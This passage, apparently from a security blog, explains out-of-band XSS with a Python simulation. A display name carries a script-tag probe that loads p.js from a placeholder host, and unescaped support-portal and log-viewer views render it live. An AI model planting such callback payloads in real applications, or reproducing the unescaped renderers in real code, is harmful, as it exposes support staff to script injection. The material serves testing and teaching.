The most common way I have observed OOB XSS being exploited is through modifying something about a user/customer account, much like in this excellent write-up about an issue with
GoDaddy’s customer service portal. Other methods might involve poisoning logs, or naming a file, a transaction or some other record in the attacker’s control so that the value is later pulled into some back-end service (a support portal, an admin panel, a log viewer) that renders it without the escaping the customer-facing pages apply.
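To make the point concrete, here is a small Python simulation (an added example, not code from the original post or from any of the products it mentions). A customer sets their display name to a blind-XSS probe; the customer-facing page escapes it, so the tester never sees it fire, while the internal support view and the log viewer concatenate the raw value into HTML. The collaborator host in the probe is a placeholder, not a real endpoint.

```python
import html
from dataclasses import dataclass

# Constructed blind-XSS probe. The host is hypothetical; in a real test it would be
# a listener you control, because the callback is the only signal you will get.
OOB_PROBE = '"><script src="https://xss.collab.example.invalid/p.js"></script>'


@dataclass
class Customer:
    uid: int
    display_name: str


# Constructed in-memory state standing in for the application's data store.
ACCOUNTS = {42: Customer(42, "Alice")}
SUPPORT_LOG: list[str] = []


def update_display_name(uid: int, name: str) -> None:
    """Customer-facing profile endpoint: stores the raw value and logs it."""
    ACCOUNTS[uid].display_name = name
    # Logs are a second sink: whoever views them later gets the same raw string.
    SUPPORT_LOG.append(f"profile update uid={uid} name={name}")


def render_customer_page(uid: int) -> str:
    """The page the tester actually sees. Output is escaped, so alert() never fires."""
    c = ACCOUNTS[uid]
    return f"<h1>Welcome, {html.escape(c.display_name)}</h1>"


def render_support_portal_vulnerable(uid: int) -> str:
    """Internal agent view that concatenates the stored field straight into HTML."""
    c = ACCOUNTS[uid]
    return f"<tr><td>{c.uid}</td><td>{c.display_name}</td></tr>"


def render_support_portal_fixed(uid: int) -> str:
    """Same view with output encoding applied at the point of rendering."""
    c = ACCOUNTS[uid]
    return f"<tr><td>{c.uid}</td><td>{html.escape(c.display_name, quote=True)}</td></tr>"


def render_log_viewer_vulnerable() -> str:
    """Log viewer that dumps raw log lines inside a <pre> block."""
    return "<pre>" + "\n".join(SUPPORT_LOG) + "</pre>"


def probe_survives(rendered: str, probe: str = OOB_PROBE) -> bool:
    """True when the probe reaches the page intact, i.e. the script tag is live."""
    return probe in rendered


def probe_all_sinks(uid: int = 42, probe: str = OOB_PROBE) -> dict[str, bool]:
    """Inject once, then check every place the value is rendered."""
    update_display_name(uid, probe)
    return {
        "customer_page": probe_survives(render_customer_page(uid), probe),
        "support_portal": probe_survives(render_support_portal_vulnerable(uid), probe),
        "support_portal_fixed": probe_survives(render_support_portal_fixed(uid), probe),
        "log_viewer": probe_survives(render_log_viewer_vulnerable(), probe),
    }


if __name__ == "__main__":
    for sink, fires in probe_all_sinks().items():
        print(f"{sink:22s} {'payload live' if fires else 'escaped'}")
```

The customer page reports "escaped" while the support portal and log viewer report "payload live", which is exactly why a plain alert box is useless here: the only evidence arrives when an agent opens the portal and the probe loads `p.js` from the listener.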
When testing for OOB XSS you will need to try additional payloads beyond your typical PoC such as an alert box: the injection fires in a context you never see, so the payload has to call back to a server you control. For example, we would want to inject payloads such as: